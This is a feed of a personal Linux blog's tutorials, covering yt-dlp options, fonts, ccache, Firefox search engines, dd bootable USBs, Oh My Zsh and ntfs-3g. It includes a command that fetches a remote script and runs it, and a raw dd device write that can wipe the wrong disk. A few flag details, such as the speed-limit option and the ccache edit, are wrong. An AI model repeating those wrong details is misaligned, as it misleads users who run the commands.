1. You will need to create a text file containing the URLs of the videos you want to download. Each URL should be on a separate line.
2. Save the text file with a name that is easy to remember, such as `video_list`.
3. Execute the following command to initiate the batch download:

```bash
yt-dlp --batch-file path/to/video_list
```

## Chapter Handling

You can manage chapters in videos with yt-dlp, allowing you to navigate through different sections of a video seamlessly.

### Embed Chapters

The `--embed-chapters` option in yt-dlp empowers you to embed chapter markers directly into the video file itself. And using player like mpv to play the video, you can easily navigate through the chapters.

```shell
yt-dlp --embed-chapters [video URL]
```

### Splitting Videos with Chapter Precision

The `--split-chapters` option in yt-dlp enables you to split videos into chapters, creating distinct files for each chapter. This feature is particularly useful when you want to enjoy specific sections of a video without manual trimming or editing.

```shell
yt-dlp --split-chapters [video URL]
```

## Subtitle Management

yt-dlp offers a range of options for managing subtitles, including downloading specific language subtitles, embedding them into videos.

```bash
yt-dlp --list-subs [video URL]
```

Executing this command provides a detailed list of subtitle formats along with their respective names.

```shell
Language   Name                                Formats
en                                             vtt
ja                                             vtt
ko                                             vtt
af-en      Afrikaans from English              vtt, ttml, srv3, srv2, srv1, json3
ak-en      Akan from English                   vtt, ttml, srv3, srv2, srv1, json3
sq-en      Albanian from English               vtt, ttml, srv3, srv2, srv1, json3
...

[info] Available subtitles for fMIn43MiwG8:
Language Name     Formats
en       English  vtt, ttml, srv3, srv2, srv1, json3
ja       Japanese vtt, ttml, srv3, srv2, srv1, json3
ko       Korean   vtt, ttml, srv3, srv2, srv1, json3
```

It&apos;s crucial to note that this is the first of two listings and primarily contains auto-generated subtitles. For the main subtitles, written by humans, refer to the final list. In the given example, only three subtitles (en, ja, ko) were crafted by a human for the video.

### Downloading Language-Specific Subtitles and Embedding Them

Download subtitles in a specific language and embed them into the video with the following command:

```shell
yt-dlp --write-sub --embed-sub --sub-lang en [video URL]
```

![subtitle-en](./subtitle-en.png)

### Downloading All Available Subtitles (Excluding Auto-Gen)

This method fetches all non-auto-generated subtitles for the video:

```shell
yt-dlp --write-sub --embed-sub --all-subs [video URL]
```

![subtitle-all](./subtitle-all.png)

### Downloading Auto-Gen Subtitles

yt-dlp facilitates the download of auto-generated subtitles as well:

```shell
yt-dlp --write-auto-sub --embed-sub --all-subs [video URL]
```

![subtitle-autogen](./subtitle-autogen.png)

## Thumbnail Management

With yt-dlp also has a feature for thumbnail, Here are base usege:

&gt;Note: This features require FFMPEG to embed.

```shell
yt-dlp --embed-thumbnail [video URL]
```

## Metadata Management

This option are disable by default, metadata are information data of this video. but if you want you can just adding `--add-metadata` or `--embed-metadata`, For example:

```shell
yt-dlp --add-metadata [video URL]
yt-dlp --embed-metadata [video URL]
```

## Download some only

How about only dowload subtitle or Thumbnail? with yt-dlp you can easily do it with `--skip-download`, For instance:

```shell
yt-dlp --write-thumbnail --skip-downoad [video URL]
```

`--write-*` can be interpreted as a download file. Same to subtitle, if you without `--write-sub` only place `--embed-sub ...` that will only embed the subtitle into video. Not including download subtitle file.

## Lots of videos (like lists/channels)

By default, you dont have worries how differernt with downloading lots of  videos. No need adding any command for this.

```shell
yt-dlp [channel URL]
yt-dlp [playlist URL]
```

## Playlist Management with yt-dlp

This section covers various yt-dlp commands for managing playlists, including downloading specific items, limiting the total number of downloads, and customizing output names.

- `--playlist-start [NUMBER]`: Begin downloading from the specified item number.
- `--playlist-end [NUMBER]`: Conclude downloading at the specified item number.
- `--playlist-items [NUMBER]`: Download specific items from the playlist.
- `--max-downloads [NUMBER]`: Limit the total number of downloads.

These commands provide granular control, enabling you to customize your download preferences for specific items or ranges within a playlist.

### Download a Specific Range of Items

To download a specific range of items, utilize the `--playlist-start` and `--playlist-end` options. For example, to download items from the third to the seventh in the playlist:

```shell
yt-dlp --playlist-start 3 --playlist-end 7 [playlist URL]
```

### Download a Specific Range (Starting Point)

If you only specify the starting point, yt-dlp will download from that point onward:

```shell
yt-dlp --playlist-start 3 [playlist URL]
```

### Download a Specific Range (Ending Point)

Similarly, specifying only the ending point results in downloading from the first item up to the specified point:

```shell
yt-dlp --playlist-end 20 [playlist URL]
```

### Download Specific Items

Replace `[range]` with your desired number format, such as `1-10` or `5,8,12-15`. This option ensures that your downloaded files are numbered according to your preference, making organization and navigation a breeze.

```bash
yt-dlp --playlist-items [range] [playlist URL]
```

### Limit the Total Number of Downloads

To cap the total number of downloads from the playlist, employ the `--max-downloads` option. For instance, to download a maximum of 10 items:

```shell
yt-dlp --max-downloads 10 [playlist URL]
```

## Output Naming Options

yt-dlp offers flexible options for specifying the output names of downloaded videos using the `-o` or `--output` parameter.

### Remove ID (with Format)

By default, the output name includes the YouTube title name and video ID. To exclude the ID, use the following format:

```shell
yt-dlp -o %(title)s.%(ext)s
```

### Output with Your Name

You can customize the output name by specifying your desired name:

```shell
yt-dlp -o &quot;Example&quot; [video URL]
```

This results in the video being named `Example.webm`.

### Output with Your Name + Custom Extensions

If you want a specific format like MP4, you can customize both the name and extension:

&gt;Note: Ensure the specified file extension corresponds to the actual video format. If not, you may need to use ffmpeg to convert the downloaded video.

```shell
yt-dlp -o &quot;Example.mp4&quot; [video URL]
```

### Output with ID Only

If you prefer the output name to include only the video ID:

```shell
yt-dlp --id [video URL]
```

The resulting output name could be something like `C-o8pTi6vd.webm`.

## Proxy Management

You can use a proxy to download videos, which can be useful for accessing videos limited to specific countries. Find a suitable proxy IP from a provider like [VPNOverview](https://vpnoverview.com/privacy/anonymous-browsing/free-proxy-servers/) and use it in yt-dlp:

```shell
yt-dlp --proxy [IP] [video URL]
```

## IP Protocol (v4, v6)

Control whether to use IPv4 or IPv6 with these options:

For IPv4:

```shell
yt-dlp -4 [video URL]
yt-dlp --force-ipv4 [video URL]
```

For IPv6:

```shell
yt-dlp -6 [video URL]
yt-dlp --force-ipv6 [video URL]
```

## Source Client IP

Specify the source client IP with:

```shell
yt-dlp --source-address [IP] [video URL]
```

## Limit Download Speed

Control the download speed to avoid impacting your network. For example, to limit the speed to 100K:

```shell
yt-dlp --throttled-rate 100K [video URL]
```</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to Install Custom Font Families in your Linux system</title><link>https://ummit.dev//posts/linux/undefine/install-font-family-on-your-linux/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/undefine/install-font-family-on-your-linux/</guid><description>Learn how to install custom font families on your Linux system using command-line methods. Personalize your environment for a unique and visually appealing experience.</description><pubDate>Sat, 12 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Customizing fonts is a simple yet impactful way to make your Linux system and applications truly your own. While clicking to install fonts can sometimes lead to inconsistencies, using the command-line interface (CLI) for installation ensures a reliable confirmation of font integration. Whether you&apos;re aiming for a personalized coding environment or a unique visual style, this guide will take you through the process of installing custom font families on your Linux system using CLI methods.

### Step 1: Download and Install Custom Fonts
To begin, you&apos;ll need to obtain the custom fonts you want to use. Websites like Google Fonts and Font Squirrel offer an array of fonts to choose from. Once you&apos;ve acquired your preferred fonts, follow these steps to install them on your Linux system using CLI:

1. **For All Users (/usr/share/fonts/):**
   - Create a directory for the font family within the system-wide fonts directory:

   ```bash
   sudo mkdir -p /usr/share/fonts/YourCustomFont
   ```

   - Copy the downloaded font files (usually in TrueType font format, .ttf) to the font family directory:

   ```bash
   sudo cp /path/to/font-file.ttf /usr/share/fonts/YourCustomFont/
   ```

   - Update the font cache to ensure the system recognizes the new fonts:

   ```bash
   sudo fc-cache -f -v
   ```

2. **For Current User (~/.local/share/fonts/):**
   - Create a directory for your fonts in your user&apos;s fonts directory (if it doesn&apos;t already exist):

   ```bash
   mkdir -p ~/.local/share/fonts
   ```

   - Copy the downloaded font files (usually in TrueType font format, .ttf) to your user&apos;s fonts directory:

   ```bash
   cp /path/to/font-file.ttf ~/.local/share/fonts/
   ```

   - Update the font cache to ensure your system recognizes the new fonts:

   ```bash
   fc-cache -f -v
   ```

### Step 2: Verify Available Fonts
To confirm that the newly installed fonts are recognized by your system, you can use the following command:

```bash
fc-list | grep &quot;YourCustomFont&quot;
```

## Optional: Configure Custom Font Families in Visual Studio Code
If you use Visual Studio Code and want to set a custom font family for your coding environment, you can follow these steps:

1. Launch Visual Studio Code.
2. Navigate to `File &gt; Preferences &gt; Settings`.

3. Alternatively, use the keyboard shortcut `Ctrl` + `,` or `Cmd` + `,`.

4. Search for &quot;font&quot; to locate the &quot;Text Editor: Font&quot; setting.

5. Click the &quot;Edit in settings.json&quot; link next to the setting.

6. In the `settings.json` file, add the following configuration to set your desired font family:

   ```text
   &quot;editor.fontFamily&quot;: &quot;YourCustomFont, monospace&quot;,
   ```

   Replace `&quot;YourCustomFont&quot;` with the name of the font you installed.

## Conclusion

Customizing fonts on your Linux system using CLI methods allows you to add a personal touch and enhance the visual aesthetics of your applications with a higher level of reliability. By following these steps and exploring different font options, you can transform your user experience and create a distinctive and engaging atmosphere that reflects your style. Enjoy the beauty of custom fonts on your Linux journey!</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Boost AUR Compilation in Arch Linux with ccache</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-speedup-compilation-time-aur/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-speedup-compilation-time-aur/</guid><description>Speed up AUR package compilation in Arch Linux using ccache. Follow our guide to unlock efficient multi-threading and caching, optimizing your software installation process.</description><pubDate>Sat, 12 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Optimizing your Arch Linux experience goes beyond mere installation – it&apos;s about maximizing efficiency during software compilation. In this guide, we&apos;ll walk you through a powerful technique to dramatically reduce compilation times for AUR (Arch User Repository) packages using a tool called `ccache`.

## Step 1: Install `ccache`

The first step towards speeding up your AUR package compilation process is installing `ccache`. This clever tool caches previously compiled object files and metadata, enabling faster subsequent compilations. To install `ccache`, use the following command:

```bash
sudo pacman -S ccache
```

## Step 2: Customize `makepkg.conf`

Now, it&apos;s time to tailor your `makepkg.conf` file to optimize your Arch Linux system. Follow these steps:

1. Open the `makepkg.conf` file using your preferred text editor. You can use a command like this to open it in the Nano text editor:

   ```shell
   sudo nano /etc/makepkg.conf
   ```

   Or you can choose any other text editor you&apos;re comfortable with.

2. Inside the `makepkg.conf` file, you&apos;ll find a section called `BUILDENV`. Locate the line that resembles the following:

   ```bash
   BUILDENV=(distcc color ccache check !sign)
   ```

   3. Remove the `!` symbol in front of `ccache`, like this:

   ```bash
   BUILDENV=(distcc color ccache check sign)
   ```

This adjustment enables the use of the `ccache` tool, which caches compilation output, thus speeding up subsequent builds.

## Step 3: Identify Your CPU Cores

Before we fine-tune the `MAKEFLAGS` settings, let&apos;s determine the exact number of CPU cores on your system. You can do this using either of the following methods:

- Use the `lscpu` command:

   ```shell
   lscpu
   ```

- Alternatively, you can employ the `nproc` command for a quick overview of the available CPU cores:

   ```shell
   nproc
   ```

   Make a note of this number; we&apos;ll use it in the next step to optimize compilation settings.

## Step 4: Optimize `MAKEFLAGS` for Your CPU

With the core count known, adjust the `MAKEFLAGS` variable in the `makepkg.conf` file accordingly. Locate the section for `MAKEFLAGS`, either by scrolling or by using `Ctrl+W` and typing `MAKEFLAGS`. Modify the line to allow for parallel compilation. For example, if your system has 10 CPU cores, set it as follows:

```bash
#-- Make Flags: change this for DistCC/SMP systems
MAKEFLAGS=&quot;-j10&quot;
```

## Step 5: Add `ccache` to PATH

For seamless access to `ccache` commands, we&apos;ll add the `ccache` binary directory to your system&apos;s PATH. Open your shell&apos;s configuration file using your favorite text editor:

### For `bash` Users:

```bash
nano ~/.bashrc
```

### For `zsh` Users:

```bash
nano ~/.zshrc
```

Add the following line to the bottom of the file:

```bash
export PATH=&quot;/usr/lib/ccache/bin/:$PATH&quot;
```

Save the changes and exit the text editor.

## Step 6: Refresh Configuration and Apply Changes

To apply the changes made to your shell&apos;s configuration file, you need to refresh the shell&apos;s configuration. This ensures that the new PATH settings for `ccache` are immediately available. Here&apos;s how you can do it:

### For `bash` Users:

```bash
source ~/.bashrc
```

The `source` command reads and executes commands from the specified file (in this case, `~/.bashrc`), making the changes take effect in the current terminal session.

### For `zsh` Users:

```bash
source ~/.zshrc
```

Similarly, `source` is used to execute the commands in `~/.zshrc`, updating the configuration in your current terminal session.

By using the `source` command, you ensure that your shell recognizes the updated PATH and other configuration changes, allowing you to use `ccache` seamlessly without needing to open a new terminal window.

## Step 7: Verify PATH Configuration

To ensure that the `ccache` directory has been added to your PATH successfully, you can check the PATH variable. Open a new terminal window to apply any recent changes and then enter the following command:

```bash
echo $PATH
```

If you see `/usr/lib/ccache/bin/` included in the output, it confirms that the PATH configuration has been successfully applied.

### Bonus Tip: Exploring Paths

If you&apos;re curious about the different paths in your `$PATH`, you can use the `echo` command in combination with the `tr` command to list each path on a separate line. This can give you a clearer view of the directories included in your PATH. Run the following command:

```bash
echo $PATH | tr &apos;:&apos; &apos;\n&apos;
```

This will display a list of directories that are part of your `$PATH`. You can then scan through the list to see if the `/usr/lib/ccache/bin/` directory is indeed included.

## Conclusion

By incorporating `ccache` and optimizing your compilation settings, you&apos;ve unlocked a new level of efficiency in your Arch Linux environment. The software installation process becomes remarkably faster, allowing you to focus on exploring and using the software you need without the wait.

Harness the power of `ccache` to supercharge your AUR package compilation, making your Arch Linux journey even more seamless and enjoyable.

## Reference

- https://ostechnix.com/speed-compilation-process-installing-packages-aur/</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Customizing Default Search Engine in Firefox Desktop</title><link>https://ummit.dev//posts/browser/firefox/firefox-custom-searchengine/</link><guid isPermaLink="true">https://ummit.dev//posts/browser/firefox/firefox-custom-searchengine/</guid><description>This article show you how to customize your default search engine on Firefox desktop.</description><pubDate>Fri, 11 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you&apos;re a Firefox user looking to set a different default search engine in the desktop version, you might have noticed that while this option is available in the mobile version, it&apos;s not as straightforward on desktop. By default, you&apos;re limited to a set of preset search engine options such as `DuckDuckGo`, `Google`, and `Bing`. lets dive into how you can customize your default search engine in Firefox desktop :)

### Modifying Firefox Configuration

Before we dive into the steps, keep in mind that these instructions involve modifying Firefox&apos;s configuration settings, which requires a bit of technical know-how. But don&apos;t worry, we&apos;ll guide you through the process.

### Step 1: Accessing the Configuration Page

1. Open Firefox and type `about:config` in the address bar.
2. You&apos;ll see a warning message about the risks of changing advanced settings. Click on the `Accept the Risk and Continue` button to proceed.

![about:config](./about-config.png)

### Step 2: Enabling Additional Search Engines

1. In the search bar at the top of the `about:config` page, enter `browser.urlbar.update2.engineAliasRefresh`.

2. Locate the preference named `browser.urlbar.update2.engineAliasRefresh` and double-click on it to toggle its value from `false` to `true`.

   ![browser.urlbar.update2.engineAliasRefresh](./browser.urlbar.update2.engineAliasRefresh.png)

### Step 3: Adding Your Preferred Search Engine

1. Now, head back to the Firefox search settings. You&apos;ll notice a new option: `Add.` Click on this option.

   ![Add new search engine](./Add.png)

2. Enter the details of your preferred search engine:

   - Search Engine Name: SearXNG
   - Engine URL: `https://search.ononoki.org/search?q=%s`
   - Alias: @SearXNG

![about:config](./added.png)

3. Click `Add Engine` to save your custom search engine.

### Step 4: Set Your Custom Search Engine as Default

1. Return to the search settings and find your newly added search engine in the list.

2. Click on the three-dot menu next to your custom search engine and select `Set as Default.`

## Conclusion

I recall searching for information on how to customize the default search engine in Firefox desktop, but I struggled to find any useful resources on the topic. While there are methods that involve using extensions, I preferred not to install any additional extension for this purpose.

Eventually, I discovered a solution on Stack Overflow, and I compiled the information provided there, adding images to enhance clarity and make it easier to understand.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Crafting a Bootable USB Drive with dd and for Your Linux Installation</title><link>https://ummit.dev//posts/linux/undefine/creating-a-bootable-usb-drive-for-your-linux-installation/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/undefine/creating-a-bootable-usb-drive-for-your-linux-installation/</guid><description>Crafting a Bootable USB Drive with &apos;dd&apos;: Your Gateway to Linux Installation</description><pubDate>Fri, 11 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

When embarking on a new Linux adventure, having a reliable bootable USB drive is your trusty companion. It&apos;s the key that unlocks the door to a world of new possibilities and operating systems. In this guide, we&apos;ll walk you through the process of creating a bootable USB drive using the powerful and versatile `dd` command. While there are other tools like `BalenaEtcher` and `Brasero` available, but in this blog focuses on the nitty-gritty details of `dd`, dd are available with most of the distribution, that means are built-in tool!, providing you with a solid foundation to kickstart your Linux installation journey.

Creating a bootable USB drive is an essential skill for any Linux enthusiast. Whether you&apos;re starting a fresh Linux installation, rescuing a system, or trying out a new distribution, having a bootable USB drive at your disposal is incredibly useful. In this guide, we&apos;ll walk you through the process of creating a bootable USB drive using the `dd` command, one of the most straightforward and versatile methods.

&gt;**This method only works with Linux distributions. Windows is not supported.**

### Prerequisites

Before we begin our step on how to make a bootable pen drive, Please backup your existing data on your pen drive as the dd command will overwrite your existing data, and make sure you have the following:

- A USB flash drive with sufficient capacity (8GB or more is recommended)
- Down Linux distribution ISO file you want to install or use (Ubuntu, linux mint, manjaro ... etc)
- **Backup your DATA!!!!**

### Step 1: Identify Your USB Drive

First, you need to identify the device name of your USB drive. Open a terminal and use the `lsblk` command to list all available block devices:

```shell
lsblk
```

Identify your USB drive based on its size and storage capacity. It will typically be listed as something like `/dev/sdX`, where `X` is a letter corresponding to your USB drive.

### Step 3: Prepare the USB Drive

Before creating the bootable USB, make sure the USB drive is unmounted. You can use the `umount` command followed by the device name to unmount any existing partitions on the USB drive. Replace `/dev/sdX` with your USB drive&apos;s device name:

```shell
sudo umount /dev/sdX
```

### Step 4: Write the ISO File to the USB Drive

With the USB drive properly formatted and ready, it&apos;s time to transfer the Linux distribution ISO file onto it. To accomplish this, we will use the ``dd`` command, a powerful yet potentially risky tool. Pay close attention and follow the instructions carefully to avoid accidental data loss.

&gt;Note: Please direct to use `SDA` or other name! . Not part of this partition. You do not need to create a file system on this pen drive. The next step of copying all the files to the pen-drive will do all the things automatically.

1. Replace `path/to/iso` in the command below with the actual file path of the downloaded Linux distribution ISO file.

2. Identify the correct device name of your USB drive. Ensure this is accurate, as the ``dd`` command will overwrite the designated device. To identify the correct device name, you can use the `lsblk` command.

3. Replace `/dev/sdX` in the command below with the correct device name of your USB drive. Triple-check this to avoid any mistakes.

4. Execute the command:

    ```shell
    sudo dd bs=4M if=path/to/iso of=/dev/sdX status=progress oflag=sync
    ```

   - `sudo`: Runs the command with superuser privileges.
   - ``dd``: The command used for data duplication.
   - `bs=4M`: Sets the block size to 4 megabytes for efficient data transfer.
   - `if=path/to/iso`: Specifies the input file (your Linux ISO).
   - `of=/dev/sdX`: Specifies the output file (your USB drive).
   - `status=progress`: Displays the progress of the data transfer.
   - `oflag=sync`: Flushes data to the output file after each write operation.

5. Wait for the process to complete. The terminal will display the progress as the ISO file is written to the USB drive.

6. Once the process is finished, the terminal will display the final summary, and you&apos;ll be returned to the command prompt.

Remember, the `dd` command has the potential to overwrite data irreversibly. Double-check your command, ensuring the correct paths and device names are used. It&apos;s always a good practice to disconnect any other external drives to minimize the risk of accidentally overwriting the wrong drive.

By following these steps, you&apos;ll successfully write the Linux distribution ISO to your USB drive, transforming it into a bootable medium ready for your Linux installation journey.

### Step 5: Safely Eject the USB Drive

After the ``dd`` command completes, you&apos;ll have a bootable USB drive. Before unplugging the drive, ensure that all data has been written and synced. You can use the `sync` command to flush any pending data to the USB drive:

```shell
sync
```

Then safely eject the USB drive using the `eject` command:

```shell
sudo eject /dev/sdX
```

### Step 6: Boot from the USB Drive

Now that your bootable USB drive is ready, you can use it to boot into a live Linux environment or install the operating system. Insert the USB drive into the target computer, restart it, and access the boot menu to select the USB drive as the boot device. The key to access the boot menu varies depending on your computer&apos;s manufacturer (common keys include `F2`, `F12`, `ESC`, or `DEL`).

## Conclusion

Creating a bootable USB drive for your Linux installation is a valuable skill that comes in handy for various scenarios. Whether you&apos;re installing a new Linux distribution, rescuing a system, or performing system maintenance, having a bootable USB drive can save the day. By following these simple steps and using the ``dd`` command, you can quickly and effectively create a bootable USB drive and unleash the power of Linux wherever you need it.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Installing Oh My Zsh and Customizing Themes</title><link>https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-install/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-install/</guid><description>Oh My Zsh is a popular and powerful shell customization framework that enhances the functionality and aesthetics of your terminal. it allows you to personalize your command-line experience to suit your preferences.</description><pubDate>Fri, 11 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Oh My Zsh

Oh My Zsh is a popular and powerful shell customization framework that enhances the functionality and aesthetics of your terminal. With a wide range of features and themes, it allows you to personalize your command-line experience to suit your preferences. In this guide, we will walk you through the process of installing Oh My Zsh and customizing a theme to make your terminal more functional and visually appealing.

### Step 1: Install Zsh

1. Open your terminal application.
2. Check if Zsh is already installed by running the command:

```shell
zsh --version
```

3. If Zsh is not installed, you can install it using your system&apos;s package manager. For Arch-based systems:

```shell
sudo pacman -S zsh
```

4. Once Zsh is installed, You can switch to the Zsh shell by typing:

```shell
zsh
```

### Step 2: Install Oh My Zsh

1. With Zsh installed, proceed to install Oh My Zsh. In your Zsh shell, execute:

```shell
sh -c &quot;$(curl -fsSL https://raw.githubusercontent.com/ohmyzsh/ohmyzsh/master/tools/install.sh)&quot;
```

2. Follow the prompts to set Oh My Zsh as your default shell.

&gt;Note: After configuring zsh as your default shell, you need to manually reboot your system. To ensure that zsh is the default shell when launching the terminal.

## Switching Themes in Oh My Zsh

Changing themes in Oh My Zsh is a breeze and allows you to transform the appearance of your terminal to suit your style. Follow these simple steps to switch to a different theme and give your terminal a fresh new look:

**Step 1: List Available Themes**

Begin by exploring the available themes using the `omz theme list` command. This command will display a list of all the themes that you can choose from:

```shell
omz theme list
```

**Step 2: Choose a New Theme**

Identify the theme that resonates with your style and workflow from the list provided by the `omz theme list` command.

**Step 3: Update the Theme**

To switch to the chosen theme, you need to update your Zsh configuration. Open the `.zshrc` file in a text editor. You can use the `nano` editor for this purpose:

```shell
nano ~/.zshrc
```

**Step 4: Change the Theme**

Within the `.zshrc` file, you will find a line that defines the `ZSH_THEME` variable. It typically looks like this:

```shell
ZSH_THEME=&quot;robbyrussell&quot;
```

Replace `&quot;robbyrussell&quot;` with the name of the theme you want to switch to. For instance, if you want to switch to the &quot;awesomepanda&quot; theme, modify the line as follows:

```shell
ZSH_THEME=&quot;awesomepanda&quot;
```

**Step 5: Save and Exit**

After making the change, save the file by pressing `Ctrl` + `O`, and then press `Enter`. To exit the editor, press `Ctrl` + `X`.

**Step 6: Apply the Changes**

To apply the new theme, you can either close and reopen your terminal or run the following command:

```shell
source ~/.zshrc
```

**Step 7: Enjoy Your New Theme**

Voila! You&apos;ve successfully changed the theme of your Oh My Zsh-powered terminal. The next time you open a terminal session, you&apos;ll experience the charm of the new theme in action.

## Essential Commands

### Command 1: `omz update`

Staying up-to-date is vital, and the `omz update` command is your shortcut to ensuring that your Oh My Zsh installation and its components are current. From plugins to themes, running this command keeps you on the cutting edge, enjoying bug fixes, feature enhancements, and performance boosts.

To execute the update, simply open your terminal and type:

```shell
omz update
```

### Command 2: `omz help`

When uncertainty arises, the `omz help` command is your trusty companion. A one-stop repository of Oh My Zsh&apos;s commands and features, this command serves as your instant reference guide. It displays a comprehensive list of available commands alongside concise explanations of their purposes.

Access the help documentation with a simple command:

```shell
omz help
```

### Command 3: `omz reload`

The `omz reload` command is for applying changes without the need to restart your shell. Whenever you modify your Oh My Zsh configuration or add new plugins, a simple execution of this command refreshes your environment, ensuring that the changes take effect immediately.

type the following command in your terminal:

```shell
omz reload
```

### Command 4: `omz version`

Stay informed about your Oh My Zsh installation with the `omz version` command. This handy command reveals the currently installed version of Oh My Zsh, allowing you to monitor your setup&apos;s status and track any updates or modifications over time.

```shell
omz version
```

With these additional commands at your disposal, you have a more comprehensive grasp of Oh My Zsh&apos;s capabilities. These tools enable you to manage your shell environment efficiently and stay updated on its status.

## In Conclusion:

Mastering these essential commands unlocks the true potential of Oh My Zsh, elevating your terminal proficiency. From effortless updates to theme customization and command references, you&apos;re equipped to conquer the command line with finesse. Embrace these tools, and watch as your terminal transforms into a productivity powerhouse. Happy terminal hacking!</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Oh My Zsh: Must-Have Plugins</title><link>https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-plugins/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/omz/ohmyzsh-plugins/</guid><description>Discover the transformative magic of Oh My Zsh, the acclaimed shell customization framework that elevates both the functionality and aesthetics of your terminal.</description><pubDate>Fri, 11 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## Why use plugins?

Oh-My-Zsh plugins are the secret sauce that can transform your terminal life. Imagine having a terminal that anticipates your needs, boosts your efficiency, and just feels right. Well, with these powerful plugins, you&apos;re about to embark on a journey to terminal enlightenment. Ready to explore? Dive in: [Oh-My-Zsh Plugins](https://github.com/ohmyzsh/ohmyzsh/wiki/Plugins)

## Git Plugin: Your Versatile Commandeer

Harnessing the power of the Git plugin within Oh My Zsh is a seamless journey that yields incredible results. By default, this plugin is already activated upon installation, ready to elevate your terminal prowess. However, if you ever wish to ensure its presence, these steps will guide your way:

1. Unlock the gateway to configuration by opening your `~/.zshrc` file:

```shell
nano ~/.zshrc
```

2. Traverse the script to locate the revered `plugins` section. Here, make certain that `git` is securely enlisted:

```shell
plugins=( git )
```

3. Seal your changes and depart from the text editor&apos;s realm.

## Install zsh-autosuggestions

The zsh-autosuggestions plugin acts as your intuitive guide, enriching your command-line interactions with unparalleled finesse. This remarkable plugin observes your keystrokes, channeling its insights from your command history to offer suggestions tailored to your context. It&apos;s akin to conversing with a terminal that understands your intentions.

1. Begin your odyssey by unlocking your terminal&apos;s gateway.
2. Navigate to the sacred grounds of custom plugins by entering:

```shell
cd ~/.oh-my-zsh/custom/plugins
```

3. Unleash the power of zsh-autosuggestions by invoking the following incantation:

```shell
git clone https://github.com/zsh-users/zsh-autosuggestions
```

### Apply zsh-autosuggestions to your shell

Prepare to sculpt your terminal interactions into an intuitive symphony, guided by the zsh-autosuggestions plugin.

1. Reenter the terminal&apos;s domain, ready to shape your experience.
2. Manipulate the script of destiny by accessing the Zsh configuration file:

```shell
nano ~/.zshrc
```

3. Traverse the mystic grounds until you encounter the sacred `plugins` realm. Here, amid echoes of commands past, usher in zsh-autosuggestions:

```shell
plugins=(zsh-autosuggestions)
```

4. Etch your alterations into existence and retreat from the text editor&apos;s realm.

#### See the effect

1. Close your terminal, allowing the old to merge with the new.
2. As you reopen your terminal, a new epoch emerges.
3. Evoke your commands with a renewed sense of purpose, as zsh-autosuggestions weave their enchantment.

Each keystroke becomes an act of collaboration. The terminal&apos;s uncanny intelligence draws from your history, guiding your commands with remarkable precision. Suggestions gracefully unfurl, a testament to the harmony of instinct and technology. The terminal transcends its role as a mere tool, transforming into an intuitive companion that empowers your journey through the digital realm.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Resolving ntfs-3g Mounting Issue on your Linux</title><link>https://ummit.dev//posts/linux/undefine/resolving-ntfs-3g-mounting-issue/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/undefine/resolving-ntfs-3g-mounting-issue/</guid><description>fix the &apos;unknown filesystem type ntfs&apos; error and enable successful mounting of NTFS partitions on your Linux system.</description><pubDate>Thu, 10 Aug 2023 00:00:00 GMT</pubDate><content:encoded>## NTFS Compatibility

The need to interact with NTFS filesystems, commonly used by Windows operating systems, is not limited to a specific Linux distribution. Both Arch Linux and Gentoo users may encounter challenges when attempting to mount NTFS partitions. Fortunately, both distributions offer solutions to address this issue and enable seamless interaction with NTFS filesystems.

## The Common Challenge

Whether you&apos;re using Arch Linux or Gentoo, you might encounter the frustrating error message:

```shell
mount: unknown filesystem type &apos;ntfs&apos;. dmesg(1) may have more information after a failed mount system call.
```

This error is a result of the modular nature of both Arch Linux and Gentoo, which requires users to take proactive steps to enable NTFS filesystem support.

## The Solution: Installing `ntfs-3g`

To ensure cross-platform compatibility and overcome the &apos;unknown filesystem type ntfs&apos; error, you need to install the `ntfs-3g` package. This package equips your system with the necessary tools to handle NTFS filesystems effectively.

### Arch Linux: install

To install the `ntfs-3g` package on Arch Linux, execute the following command in your terminal:

```shell
sudo pacman -S ntfs-3g
```

By taking this simple step, you ensure that your Arch Linux system has the capability to interact with NTFS partitions, enhancing your cross-platform compatibility and eliminating obstacles when accessing files stored on NTFS drives.

### Gentoo: install

Similarly, Gentoo Linux provides a flexible environment that allows users to tailor their system components. To install the `ntfs-3g` package on Gentoo, execute the following command in your terminal:

```shell
sudo emerge sys-fs/ntfs3g
```

By embracing this solution, you enable your Gentoo Linux system to work seamlessly with NTFS filesystems, enhancing your ability to collaborate and manage files across different platforms.

## Embracing Compatibility

Both Arch Linux and Gentoo Linux demonstrate their adaptability and user-centric philosophy by offering solutions to enable NTFS compatibility. By installing the `ntfs-3g` package, you ensure that your Linux environment can effortlessly interact with Windows-based filesystems, fostering efficient data exchange and collaboration.

## Conclusion

